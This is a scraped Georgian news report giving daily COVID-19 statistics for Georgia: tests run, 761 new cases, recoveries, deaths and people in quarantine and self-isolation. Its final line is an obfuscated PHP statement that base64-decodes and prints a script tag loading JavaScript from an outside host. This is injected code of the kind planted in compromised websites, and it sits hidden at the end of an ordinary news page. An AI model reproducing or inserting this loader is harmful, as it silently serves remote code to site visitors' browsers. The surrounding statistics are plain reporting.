celsiusi
ავერსი საქკაბელი
Stopcov.ge-ზე გამოქვეყნებული ინფორმაციის თანახმად, ინტენსიური ტესტირების ფარგლებში, ბოლო 24 საათში ქვეყნის მასშტაბით ჩატარდა 34 201 კვლევა ტესტით, მათ შორის 20 281 კვლევა ანტიგენის ტესტით და 13 920 PCR ტესტით.
 
ჩატარებული ტესტირების შედეგად, ბოლო 24 საათში გამოვლინდა ვირუსით ინფიცირების 761 ახალი დადასტურებული შემთხვევა.
 
რის შედეგადაც, ქვეყანაში კოვიდ-19-ის პანდემიის გავრცელებიდან დღემდე გამოვლენილი დადასტურებული შემთხვევების საერთო რაოდენობა 286 406-მდე გაიზარდა.
 
რაც შეეხება დადებითობის მაჩვენებელს, 7 აპრილის მდგომარეობით, დადებითობის დღიური მაჩვენებელი არის 2.23 %, ბოლო 14 დღის მანძილზე - 2.03%, ხოლო 7 დღის მანძილზე - 2.50%.
 
ბოლო 24 საათში ვირუსისგან გამოჯანმრთელდა 537 პირი, ხოლო ჯამში გამოჯანმრთელებულთა რაოდენობა გაიზარდა 276 084-მდე.
 
ბოლო 24 საათში კორონავირუსით გარდაცვალების 9 ახალი შემთხვევა დაფიქსირდა. პანდემიის გავრცელებიდან დღემდე ვირუსს ჯამში 3 849 პირი ემსხვერპლა.
 
დღეს ქვეყანაში გამოვლენილი ინფიცირების 761 ახალი შემთხვევიდან, 434 შემთხვევა თბილისში დაფიქსირდა დანარჩენები კი რეგიონებზე გადანაწილდა.
 
ვირუსის მკურნალობის კურსს ქვეყნის მაშტაბით 4088 პირი  საცხოვრებელ ბინაზე გადის. საკარანტინე სივრცეებში მოთავსებულია 229 ადამიანი, მათ შორის, თბილისში - 106, ხოლო აჭარაში - 35. 
 
სულ 6 ოქტომბრიდან - 7 აპრილის პერიოდში, სახელმწიფო საზღვრიდან საკარანტინე სივრცეებში გადაყვანილია - 24 090 პირი.
 
ამ ეტაპისთვის თვითიზოლაციაში იმყოფება 11 270 ადამიანი, მათ შორის თბილისში - 5 031 პირი, აჭარაში - 1 754, იმერეთში - 975.
 
 
1204
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");